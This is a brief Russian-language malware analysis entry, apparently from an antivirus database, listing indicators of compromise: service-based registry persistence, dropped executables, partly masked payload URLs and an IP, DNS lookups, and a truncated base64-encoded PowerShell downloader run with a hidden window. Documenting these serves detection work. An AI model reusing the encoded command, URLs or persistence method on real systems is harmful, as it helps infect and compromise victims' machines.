Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\dmime] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dmime] 'ImagePath' = '"%WINDIR%\SysWOW64\slwga\dmime.exe"'
- 'dmime' "%WINDIR%\SysWOW64\slwga\dmime.exe"
- 'dmime' %WINDIR%\SysWOW64\slwga\dmime.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB5AG8AdQB0AHMAbwBpAHYAPQAnAHkAbwBvAHQAYwBoAGUAdABkAHUAdQB5AHkAbwB1AHgAawBlAGEAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAUgBpAGAAVAB5AF...
- %HOMEPATH%\332.exe
- %HOMEPATH%\332.exe
- %HOMEPATH%\332.exe в %WINDIR%\syswow64\slwga\dmime.exe
- %HOMEPATH%\332.exe
- '94.##.254.194':80
- http://ph###huan.com/wp-admin/h/
- http://rm####etstore.com/cwu/l6y/
- http://fi#####rcleanerstx.com/h/procurement/9uvmim/
- http://94.##.254.194/JJiB60YbQ2UBcf/
- DNS ASK ki###ani.com
- DNS ASK ph###huan.com
- DNS ASK rm####etstore.com
- DNS ASK fi#####rcleanerstx.com
- DNS ASK th####rarysamui.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB5AG8AdQB0AHMAbwBpAHYAPQAnAHkAbwBvAHQAYwBoAGUAdABkAHUAdQB5AHkAbwB1AHgAawBlAGEAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAUgBpAGAAVAB5AF...' (со скрытым окном)